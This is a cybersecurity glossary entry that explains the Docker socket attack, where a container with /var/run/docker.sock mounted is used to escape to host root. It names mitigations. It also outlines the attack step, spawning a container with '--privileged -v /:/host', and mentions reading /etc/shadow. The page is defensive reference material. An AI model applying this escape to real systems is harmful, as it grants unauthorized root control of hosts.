Docker Socket Attack
What is Docker Socket Attack?
Docker Socket AttackAbusing a container that has /var/run/docker.sock mounted to control the Docker daemon, escape the container, and gain root on the host.
The Docker socket /var/run/docker.sock is an unauthenticated control plane for the Docker daemon, which runs as root on the host. When a container mounts the socket (commonly done to give CI runners, monitoring agents, or sidecars access to Docker), any process inside can call the daemon API. An attacker who reaches that container can create a new privileged container that bind-mounts the host filesystem at /, install a backdoor, read /etc/shadow, or pivot to the host network namespace. Mitigations: never bind-mount docker.sock into untrusted containers, use rootless Docker, expose the daemon over TLS with mTLS, or replace direct access with restricted brokers like sysbox or kaniko.
● Examples
- 01
Compromising a Jenkins agent container that mounts /var/run/docker.sock and spawning a new container with --privileged -v /:/host.
- 02
An attacker inside Portainer's container using the bound socket to enumerate and start root containers.
● Frequently asked questions
What is Docker Socket Attack?
Abusing a container that has /var/run/docker.sock mounted to control the Docker daemon, escape the container, and gain root on the host. It belongs to the Attacks & Threats category of cybersecurity.
What does Docker Socket Attack mean?
Abusing a container that has /var/run/docker.sock mounted to control the Docker daemon, escape the container, and gain root on the host.
How does Docker Socket Attack work?
The Docker socket /var/run/docker.sock is an unauthenticated control plane for the Docker daemon, which runs as root on the host. When a container mounts the socket (commonly done to give CI runners, monitoring agents, or sidecars access to Docker), any process inside can call the daemon API. An attacker who reaches that container can create a new privileged container that bind-mounts the host filesystem at /, install a backdoor, read /etc/shadow, or pivot to the host network namespace. Mitigations: never bind-mount docker.sock into untrusted containers, use rootless Docker, expose the daemon over TLS with mTLS, or replace direct access with restricted brokers like sysbox or kaniko.
How do you defend against Docker Socket Attack?
Defences for Docker Socket Attack typically combine technical controls and operational practices, as detailed in the full definition above.
What are other names for Docker Socket Attack?
Common alternative names include: docker.sock mount escape, Container escape via Docker socket.
● Related terms
- cloud-security№ 211
Container Escape
An exploit that breaks the isolation boundary between a container and its host, giving the attacker code execution on the underlying node or kernel.
- cloud-security№ 213
Container Security
The practice of securing container images, registries, orchestrators, and the runtime in which containers execute.
- attacks№ 1116
Supply Chain Attack
An attack that compromises a trusted third-party software, hardware, or service provider in order to reach its downstream customers.
- vulnerabilities№ 860
Privilege Escalation
A class of vulnerabilities that lets an attacker gain rights beyond those originally granted, such as moving from a normal user to administrator.